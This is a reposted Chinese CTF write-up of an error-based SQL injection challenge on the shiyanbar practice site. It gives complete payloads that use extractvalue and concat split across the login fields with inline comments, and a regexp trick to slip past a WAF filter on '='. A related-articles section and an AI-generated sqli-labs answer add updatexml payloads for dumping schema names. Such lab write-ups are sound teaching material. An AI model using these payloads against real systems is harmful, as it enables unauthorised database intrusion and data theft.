实验吧--加了料的报错注入

最新推荐文章于 2025-08-15 22:28:40 发布
转载 最新推荐文章于 2025-08-15 22:28:40 发布 · 158 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/AxsCtion/p/11027005.html
文章标签:

#php #数据库

本文详细介绍了在CTF竞赛中如何利用SQL注入爆破目标数据库,通过修改请求方式和构造payload,成功获取了数据库名、表名及列名,最终直接获得了flag。文章还分享了面对WAF过滤时的解决策略。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目链接:http://ctf5.shiyanbar.com/web/baocuo/index.php

tips里面说post username and password...

我这里采用的抓包,也可以用hackbar

把get方式改为post后,放进repeater里面

构造第一条payload:username=1' OR extractvalue/*&password=1*/(1,concat(0x7e,(select database()),0x7e)) or'

这里采用的函数是 extractvalue()concat() 以及/**/内联注释

extractvalue()的讲解是

  extractvalue():从目标XML中返回包含所查询值的字符串。
  EXTRACTVALUE (XML_document, XPath_string); 
  第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 
  第二个参数:XPath_string (Xpath格式的字符串)

concat函数是返回结果为连接参数产生的字符串

爆出数据库...

继续往下爆

下一条payload username=1' OR extractvalue/*&password=1*/(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema regexp database()),0x7e)) or'

一开始尝试 where table_schema = database(),发现waf将 = 过滤掉了,采用regexp(mysql正则)

爆出表

 

 先试试第一个

payload username=1' OR extractvalue/*&password=1*/(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name regexp 'ffll44jj'),0x7e)) or'

我丢。。flag出来了

 

转载于:https://www.cnblogs.com/AxsCtion/p/11027005.html

实验吧——WEB-简单的登录题、后台登录、报错注入、你真的会PHP吗?
迷风小白
03-29 2885
一. 简单的登录题 这道题确实一点都不简单 二、后台登录 这道题打开就是一个登录框,输入一个1,提示密码错误,查看源代码。 <!-- $password=$_POST['password']; $sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'"; $r...
实验吧WP(web部分)【简单的登录题,后台登录,报错注入,认真一点,你真的会PHP吗?】
taozijun的博客
05-22 7524
一. 简单的登录题这道题一点也不简单,用到cbc字节翻转攻击等技术,先跳过这题,想了解可看实验吧上pcat大神的writeup。二. 后台登录这道题
实验吧 后台登录writeup
JacobTsang的博客
10-29 283
1)解题链接: http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 2)php源码: &lt;php? $password=$_POST['password']; $sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($passw...
实验-报错注入
一个安全研究员
06-04 3733
前言 不得不说这一题对我来说挺有难度的,以前没有遇到过。看了别人的writeup过后,也想要记录一下,给自己攒攒经验 这题的解法有两种: (1)HPF(http parameter fragment) (2)exp()报错注入 HPF注入 查看源码: 就是要提交post数据,我直接在burpsuite里面操作。 随便输入两个参数,页面提示login failed。根据源码中的s...
实验-报错注入 Writeup
baynk的博客
07-31 296
这玩意弄了两天才搞完,昨天和朋友聊天聊到了12点。。1点多就困得不行了,没时间写,晚上利用自习时间先开个头,抢时间写完。。。 过程 进去后就有提示需要post用户名和密码,于是照着来了,没发现什么,于是审查一下源代码,发现有提示出连接数据库的语句。 手动试了下注入,发现过滤了注释和=号,也没什么有用的提示,所以就去用bp跑一下哪些字是被过滤的。 用户名那里过滤了不少东西,特别是括号"(",")"...
CTF实验- 报错注入分值
欢迎光临
12-11 495
  用burpsuit对username进行fuzz一下,发现过滤了超多东西, 被过滤就会显示 user name unknow error 或者Sql injection detected 或者Unknown password error. 没有过滤只会显示 Login failed # limit strsub union () , 没有过滤 extractvalue,up...
实验-web-报错注入(注释符/**/、post注入)
Sea_Sand息禅
03-17 511
页面提示,让post username和password,hackbar现在是越来越差劲了,直接用的bp。 报错注入来说,也有几个类型,不过这里我用的updatexml,经测试,extractvalue也是可以的。 首先,fuzz一下username和password: select、update这些都没有被过滤 而这些被过滤,系统识别是sql注入: 经测试,=是被SQL注...
实验吧——报错注入
xiaoyuer0123的博客
09-02 282
# -*- coding:utf8 -*- import requests import re def denglu(username,password): # 设置代理,用于调试过程中抓包分析 proxies = { "http": "http://localhost:9008", "https": "http://localhost:9008"...
实验吧 WEB 报错注入
fr4granc3
01-28 1516
没有用户名和密码的输入框,因此不能直接在URL中传递username和password参数。要使用hackbar或者burpsuit传。(还不太理解为什么) 首先尝试username=1&amp;amp;password=1,提示Login failed。 尝试username='or'1&amp;amp;password='or'1,提示You are our member, welcome to ...
报错注入-实验
xuchen16的博客
10-08 405
转载自:https://blog.youkuaiyun.com/xiaorouji/article/details/80587568 去fuzz一下waf可以看到username不能用括号,然鹅password不能用floor,updatexml,polygon,multipoint,extractvalue,geometrycollection,multinestring,mulpolygon,lines...
实验报错注入
JacobTsang的博客
10-29 297
注意GET请求和POST请求包头的区别 否则参数传递不到后台 GET请求: Content-Type: application/json POST请求: Content-Type:application/x-www-form-urlencoded 构造字典扫一下注入点过滤了哪些关键字: xpath injection 报错注入分析之updatexml注入 链接:http://www.mami...
网络安全-sql注入实战-sql-labs(1~10)
09-02
4. 了解并实践各种注入方法,如布尔型盲注、时间型盲注、报错注入等。 5. 学习如何防范SQL注入,提高个人或企业Web应用的安全防御能力。 6. 练习利用现成的注入工具进行攻击,理解自动化工具的工作原理和限制。 7. ...
aircrack-ng 介绍、功能测试及部分源码分析
热门推荐
m0_51937621的博客
01-17 1万+
aircrack-ng 介绍、功能测试及部分源码分析 【实验目的】 1、理清aircrack-ng的总体设计框架,包括各模块的功能与联系; 2、核心模块的实现原理(aircrack-ng、aireplay-ng、airodump-ng) 【实验要求】 1、 查找aircrack-ng软件相关资,搞清楚是什么的问题。 2、 分析aircrack-ng的功能以及对应的实现模块和各模块的依赖关系 3、 主要攻击方式和流程介绍 4、 对WPA/WPA2密方式和破解进行深入探究 5、 阅读aircrack-ng,
如何构建PHP表单页面及验证相关原理(PHP基础)
2301_81242582的博客
08-12 1149
思路为 通过if – else + empty()函数 语句实现是否为空的验证以及错误信息的设置,最终在HTML页面对错误信息进行输出。
记一次 .NET 某汽车控制焊接软件 卡死分析
一线码农的专栏
08-12 363
这次卡死事故原因是安全软件介入了 GC 过程,让 STW 迟迟得不到结束,哎,窗体类程序的生存环境举步维艰啊。。。
企业高性能web服务器(4)
m0_74028286的博客
08-12 828
反向代理:reverse proxy,指的是代理外网用户的请求到内部的指定的服务器,并将数据返回给用户的一种方式,这是用的比较多的一种方式。Nginx 除了可以在企业提供高性能的web服务之外,另外还可以将 nginx 本身不具备的请求通过某种预定义的协议转发至其它服务器处理,不同的协议就是Nginx服务器与其他服务器进行通信的一种规范,主要在不同的场景使用以下模块实现不同的功能逻辑调用关系:访问逻辑图:同构代理:用户不需要其他程序的参与,直接通过http协议或者tcp协议访问后端服务器。
[TryHackMe]Internal(hydra爆破+WordPress主题修改getshell+Chisel内网穿透)
Future_Hk的博客
08-12 1193
nmap + gobuster一套由WordPress运作发现版本为5.4.2没有相关exploit空密码被禁止回到刚刚的WP后台登录页面有一个找回密码的功能点我们可以知道admin是一个存在的用户利用hydra进行爆破查询记得添-f 选项 这会在发现第一个匹配的密码后停止爆破线程-t最大为64my2boys邮件:登录后台看到这个功能眼前一亮 和之前一期同样的漏洞原理我可以任意修改代码将404.php代码替换为我的网页shell代码。
NAT 和 PNAT
最新发布
liulanba的博客
08-15 703
NAT与PNAT技术对比与总结 NAT(网络地址转换)和PNAT(端口网络地址转换)是解决IPv4地址枯竭的核心技术。NAT通过修改IP包头实现私有IP与公网IP的转换,支持静态映射(1:1 NAT)和动态IP池分配。而PNAT(又称NAPT/PAT)在NAT基础上增端口重写功能,允许多台内网设备通过单一公网IP的不同端口并发访问互联网,极大提升了IP复用效率。两种技术均能隐藏内网拓扑结构,但PNAT凭借端口级转换能力成为当前最主流的解决方案,典型实现如Linux的MASQUERADE规则。该技术使家庭/
sqli-labs 5、6报错注入通关方式
03-28
<think>好的,我现在需要解决用户关于SQLi-Labs第5关和第6关的报错注入解法的问题。首先,我得回忆一下这两个关卡的特点。用户提到的是报错注入,所以可能需要利用数据库报错机制来获取信息。 根据引用中的信息,第5关是双引号闭合,而第6关则是双引号闭合括号?或者可能用户提供的引用[1]提到第6关是双引号闭合,而第5关可能也是类似的,但需要确认。比如引用[1]说第六关是http://10.40.1.22/sqli-labs-master/Less-6/?id=1" --+,这说明闭合方式可能是双引号,而第五关可能类似,但可能闭合方式不同?比如第五关可能是单引号闭合? 不过用户提供的引用[1]提到第五关是双引号闭合,但可能我记错了,可能需要再核对。比如用户提供的引用[1]中说:“和第五关一样 只是双引号闭合”,所以可能第五关原本是单引号闭合,而第六关是双引号闭合?或者反过来? 假设第五关是单引号闭合,第六关是双引号闭合,那么报错注入的构造方式可能不同。报错注入常用的方法有extractvalue、updatexml、floor等函数。需要构造能够触发数据库报错并返回信息的语句。 比如,在第五关中,正确的闭合可能是单引号,所以构造的注入点需要闭合单引号,然后使用报错函数。例如,输入' or updatexml(1, concat(0x7e, (select database())), 1) --+,这样可能会触发报错,返回数据库名称。 对于第六关,闭合方式是双引号,所以构造的payload可能需要用双引号闭合,例如" or updatexml(1, concat(0x7e, (select user())), 1) --+,这样同样触发报错。 另外,用户提到的引用[4]中的union select语句可能涉及信息模式,比如查询表名或列名,但在报错注入中可能无法直接使用union,而是通过子查询嵌入到报错函数中。 需要注意的点包括闭合方式是否正确,是否需要注释掉后续的SQL代码,以及如何构造正确的子查询来获取数据。例如,使用concat函数将查询结果与特殊字符(如波浪号)结合,以触发报错信息的显示。 此外,用户可能需要知道如何逐步获取数据库名、表名、列名和数据。例如,首先确定闭合方式,然后使用报错函数一步步获取所需信息。比如,先测试闭合方式,然后构造报错语句,获取当前数据库名,接着查表名,再查列名,最后获取数据。 可能还需要考虑数据库类型(如MySQL),因为不同的数据库函数可能不同。根据SQLi-Labs的设置,通常使用的是MySQL,所以应使用对应的函数和语法。 总结步骤可能是: 1. 确定注入点闭合方式(第五关单引号,第六关双引号)。 2. 使用报错函数,如updatexml或extractvalue,构造payload获取信息。 3. 逐步获取数据库名、表名、列名,最终提取数据。 4. 注意闭合后面的引号,并注释掉后续语句,如使用--+或#注释。 另外,引用中提到使用sqlmap工具,但用户可能希望手动注入的方法,所以需要提供具体的payload示例。</think>### SQLi-Labs 第5关和第6关报错注入解法 #### **第5关:单引号闭合报错注入** 1. **判断注入类型** 输入`?id=1'`触发数据库报错,确认存在单引号字符型注入[^1]。 2. **构造报错Payload** 使用`updatexml()`函数触发错误回显: ``` ?id=1' and updatexml(1, concat(0x7e, (select database()), 0x7e), 1) --+ ``` - `0x7e`是`~`符号,用于分隔回显内容[^4]。 3. **获取数据库名** 通过报错信息可看到当前数据库名(如`security`)。 4. **提取表名和列名** ``` ?id=1' and updatexml(1, concat(0x7e, (select group_concat(table_name) from information_schema.tables where table_schema=database()), 0x7e), 1) --+ ``` 同理替换`column_name`和`table_name`获取字段名。 --- #### **第6关:双引号闭合报错注入** 1. **判断闭合方式** 输入`?id=1"`触发报错,确认双引号闭合[^1]。 2. **构造Payload** 将第5关的单引号替换为双引号: ``` ?id=1" and updatexml(1, concat(0x7e, (select database()), 0x7e), 1) --+ ``` 3. **分段获取数据** 若结果被截断,使用`substr()`分步提取: ``` ?id=1" and updatexml(1, concat(0x7e, substr((select group_concat(column_name) from information_schema.columns where table_name='users'),1,30), 0x7e), 1) --+ ``` --- #### **关键技巧** - **闭合与注释**:确保闭合引号并使用`--+`或`#`注释后续语句。 - **信息模式表**:通过`information_schema`查询元数据。 - **工具辅助**:复杂场景可用`sqlmap`自动化探测(参考引用[2])。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值